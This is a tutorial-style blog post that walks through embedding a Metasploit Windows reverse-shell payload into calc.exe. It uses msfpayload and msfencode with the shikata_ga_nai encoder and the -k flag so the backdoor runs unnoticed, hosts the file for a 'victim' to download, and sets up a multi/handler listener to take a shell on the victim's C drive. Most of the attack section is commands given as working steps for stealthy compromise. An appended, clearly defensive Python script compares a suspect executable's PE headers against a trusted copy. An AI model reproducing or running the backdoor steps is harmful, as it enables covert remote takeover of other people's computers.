Create and Embed a Payload in an Existing Executable


In my previous posts I explained how to create our own payload to gain access to a victim's machine.

But that approach had a problem: when a targeted user launches a backdoored executable such as the one we just generated, nothing will appear to happen, and that can raise suspicions.

To improve your chances of not tipping off a target, you can launch a payload while simultaneously continuing normal execution of the launched application.

So I am going to download an executable file that works on Windows 7; for that I chose the Calculator program.

#wget -c

In this listing, we download the Calculator executable program and then use Calc with the -k flag. The -k flag configures the payload to launch in a separate thread from the main executable so the application will behave normally while the payload is being executed.

When choosing to embed a payload in an executable, you should consider using GUI-based applications if you’re not specifying the -k flag. If you embed a payload into a console-based application, when the payload is run, it will display a console window that won’t close until you’re finished using the payload. If you choose a GUI-based application and do not specify the -k flag, when the payload is executed, the target will not see a console window.

Paying attention to these little details can help you remain stealthy during an engagement.

We can use msfencode to embed an msfpayload payload into an existing executable so that the new executable still functions like the original. So if you inject into calc.exe, you get calc.exe and your backdoor.

For the list of msfencode options, type msfencode -h in a terminal.

#msfencode -h


Let’s make our new backdoored executable.

#msfpayload windows/shell_reverse_tcp LHOST= LPORT=8080 R | msfencode -t exe -x /home/sathish/Downloads/calc.exe -k -o /var/www/calc_backdoor.exe -e x86/shikata_ga_nai -c 5


We add the R flag to the msfpayload command line to specify raw output, because we will pipe its output directly into msfencode. We specify the x86/shikata_ga_nai encoder with -e and an iteration count of 5 with -c, and tell msfencode to produce executable output (-t exe) and write it to /var/www/calc_backdoor.exe (-o). The -x option names the template executable, and the -k option keeps the template working by running the payload in a new thread. Finally, we run a quick check to ensure that the resulting file is in fact a Windows executable.

I have already built a web server, so the target machine can download the executable file from that server and execute it. We have a functional calc.exe and our shell.


It will prompt a warning notification; ignore it and run the executable.


Now we have a working executable, so we can start a listener with the multi/handler module in msfconsole. multi/handler allows Metasploit to listen for reverse shell connections.


#msf > use exploit/multi/handler

#msf exploit(handler) > show options

#msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp

#msf exploit(handler) > set LHOST

#msf exploit(handler) > set LPORT 8080


We first use the multi/handler module and get a quick display of the options. Then we set our payload to be a Windows reverse shell so that it matches the behavior of the executable we created earlier, tell it the IP and the port to listen on, and we’re ready to go.

#msf exploit(handler) > exploit

Once the victim has downloaded the file and run it on his computer, you will see the responses on your computer.


This will create a channel, and you can access the Windows machine. You will now see that you have access to the C drive of the victim's computer, basically the drive on which the OS is installed.
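Because the backdoored calc.exe still behaves like the original, running it tells a defender nothing; comparing it with a trusted copy of the same program does. The following is an added example, not part of the original post: it parses the PE headers of both files and reports a moved entry point and added or altered sections. The function names and the sample images are constructed for illustration, and it makes no assumption about which of these fields a particular tool changes.

```python
import hashlib
import struct

def pe_summary(data):
    """Return (entry point RVA, {section name: (raw size, SHA-256)}) for a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off, = struct.unpack_from("<I", data, 0x3C)            # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    nsect, = struct.unpack_from("<H", data, pe_off + 6)       # NumberOfSections
    opt_size, = struct.unpack_from("<H", data, pe_off + 20)   # SizeOfOptionalHeader
    entry, = struct.unpack_from("<I", data, pe_off + 40)      # AddressOfEntryPoint
    sections = {}
    for i in range(nsect):
        off = pe_off + 24 + opt_size + 40 * i                 # 40-byte section headers
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)
        sections[name] = (raw_size, hashlib.sha256(data[raw_ptr:raw_ptr + raw_size]).hexdigest())
    return entry, sections

def diff_against_known_good(good, suspect):
    """List header and section differences between a trusted copy and a suspect copy."""
    (g_entry, g_sec), (s_entry, s_sec) = pe_summary(good), pe_summary(suspect)
    findings = []
    if g_entry != s_entry:
        findings.append(f"entry point moved: {g_entry:#x} -> {s_entry:#x}")
    for name in sorted(s_sec.keys() - g_sec.keys()):
        findings.append(f"added section: {name!r}")
    for name in sorted(g_sec.keys() & s_sec.keys()):
        if g_sec[name] != s_sec[name]:
            findings.append(f"section modified: {name!r}")
    return findings

def build_sample(entry, sections):
    """Constructed PE-shaped test image: headers plus raw section bytes, not a runnable program."""
    hdr = bytearray(b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40))
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    hdr += struct.pack("<H14xI", 0x10B, entry).ljust(0xE0, b"\0")
    raw_ptr, body = len(hdr) + 40 * len(sections), b""
    for name, content in sections:
        hdr += struct.pack("<8sIIII16x", name.encode(), len(content), 0, len(content), raw_ptr + len(body))
        body += content
    return bytes(hdr + body)

# Constructed inputs: a "trusted" image and a copy with a new section and a new entry point.
GOOD = build_sample(0x1000, [(".text", b"\x90" * 32), (".data", b"\x00" * 16)])
SUSPECT = build_sample(0x3000, [(".text", b"\x90" * 32), (".data", b"\x00" * 16), (".extra", b"\xcc" * 64)])
print("\n".join(diff_against_known_good(GOOD, SUSPECT)))
```

In practice the trusted copy comes from the vendor's installation media or a clean system of the same build, and a failed Authenticode signature check on the suspect file is a faster first signal than a header diff.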
